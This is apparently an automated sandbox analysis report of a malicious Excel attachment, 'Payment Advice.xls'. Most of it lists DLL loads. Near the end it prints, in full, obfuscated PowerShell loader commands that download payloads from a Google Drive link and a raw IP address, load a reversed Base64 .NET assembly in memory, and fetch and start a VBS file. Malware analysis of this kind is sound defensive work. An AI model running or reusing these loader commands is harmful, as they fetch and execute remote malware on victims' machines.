              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netapi32.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wkscli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: samcli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: samlib.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: Payment Advice.xlsStatic file information: File size 1080832 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.pdb source: powershell.exe, 00000011.00000002.483591075.0000000002561000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.pdb source: powershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.pdbhP source: powershell.exe, 00000011.00000002.483591075.00000000027AE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.pdbhP source: powershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp
              Source: A5330000.0.drInitial sample: OLE indicators vbamacros = False
              Source: Payment Advice.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              barindex
              Obfuscated command line found
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              PowerShell case anomaly found
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtz